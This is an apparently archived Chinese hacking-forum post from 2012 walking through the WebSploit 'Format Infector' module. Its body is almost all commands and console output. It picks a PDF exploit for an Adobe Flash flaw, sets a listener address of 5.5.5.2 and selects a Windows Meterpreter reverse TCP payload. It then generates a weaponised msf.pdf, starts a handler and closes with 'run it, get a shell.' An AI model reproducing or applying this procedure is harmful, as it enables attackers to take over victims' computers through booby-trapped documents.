切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
180 WebSploit 2 本地文件漏洞[复制链接]
发表于 2012-10-2 15:54:21 | 显示全部楼层 |!read_mode!
启动他
  1. root@Dis9Team:/pen/WebSploit# ./websploit
复制代码

看选项
选择 [4]Format Infector         Inject Custom Payload Into File Formats

继续 提供这么多的类型 6个漏洞

  1. ID & Format                 Description
  2.         ------------                --------------
  3.         [1]PDF                         Adobe Flash Player [newfunction] Invalid Pointer Use
  4.         [2]RTF                         Microsoft Word RTF [pFragments] Stack Buffer Overflow
  5.         [3]PPT                         Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow
  6.         [4]XLS                         Microsoft Excel Malformed FEATHEADER Record Vulnerability
  7.         [5]VBP                         Microsoft Visual Basic VBP Buffer Overflow
  8.         [6]EPS                         Adobe Illustrator CS4 v14.0.0
复制代码
都是WINDOWS的文件 选择 1wsf:Infector > Enter ID Of Format : 1
配置IP
wsf:Infector > Enter Your IP Address (Use In Reverse Payload) : 5.5.5.2
选择后门方式
  1. ID & Payload                 Description
  2.         ------------                --------------
  3.         [1]Bind TCP                 Windows Meterpreter (Reflective Injection), Bind TCP Stager
  4.         [2]Reverse TCP                 Windows Meterpreter (Reflective Injection), Reverse TCP Stager
  5.         [3]DLL,Reverse                 Reflective Dll Injection, Reverse TCP Stager
  6.         [4]DLL,Bind                 Reflective Dll Injection, Bind TCP Stager

  7. wsf:Infector > Select Payload : 2
复制代码

配置METASPLOIT文件生成
  1. [*] The initial module cache will be built in the background, this can take 2-5 minutes...

  2. # cowsay++
  3. ____________
  4. < metasploit >
  5. ------------
  6.        \   ,__,
  7.         \  (oo)____
  8.            (__)    )\
  9.               ||--|| *


  10.        =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
  11. + -- --=[ 901 exploits - 491 auxiliary - 150 post
  12. + -- --=[ 250 payloads - 28 encoders - 8 nops
  13.        =[ svn r15622 updated today (2012.07.12)

  14. PAYLOAD => windows/meterpreter/reverse_tcp
  15. LHOST => 5.5.5.2
  16. [*] Creating 'msf.pdf' file...
  17. [+] msf.pdf stored at /root/.msf4/local/msf.pdf

  18. [*] Do You Want To Create Listener ? <y/n> :y
  19. [*] Please wait while we load the module tree...
  20. [*] The initial module cache will be built in the background, this can take 2-5 minutes...

  21. _                                                      _
  22. /  \  / \        __                          _   __    /_/ __
  23. | |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
  24. | | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
  25. |_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
  26.       |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


  27.        =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
  28. + -- --=[ 901 exploits - 491 auxiliary - 150 post
  29. + -- --=[ 250 payloads - 28 encoders - 8 nops
  30.        =[ svn r15622 updated today (2012.07.12)

  31. PAYLOAD => windows/meterpreter/reverse_tcp
  32. LHOST => 5.5.5.2
  33. [*] Started reverse handler on 5.5.5.2:4444
  34. [*] Starting the payload handler...
复制代码
查看一下:
  1. root@Dis9Team:/pen/WebSploit# file /root/.msf4/local/msf.pdf
  2. /root/.msf4/local/msf.pdf: PDF document, version 1.5
  3. root@Dis9Team:/pen/WebSploit#
复制代码
运行它 取得SHELL



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 20:09

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部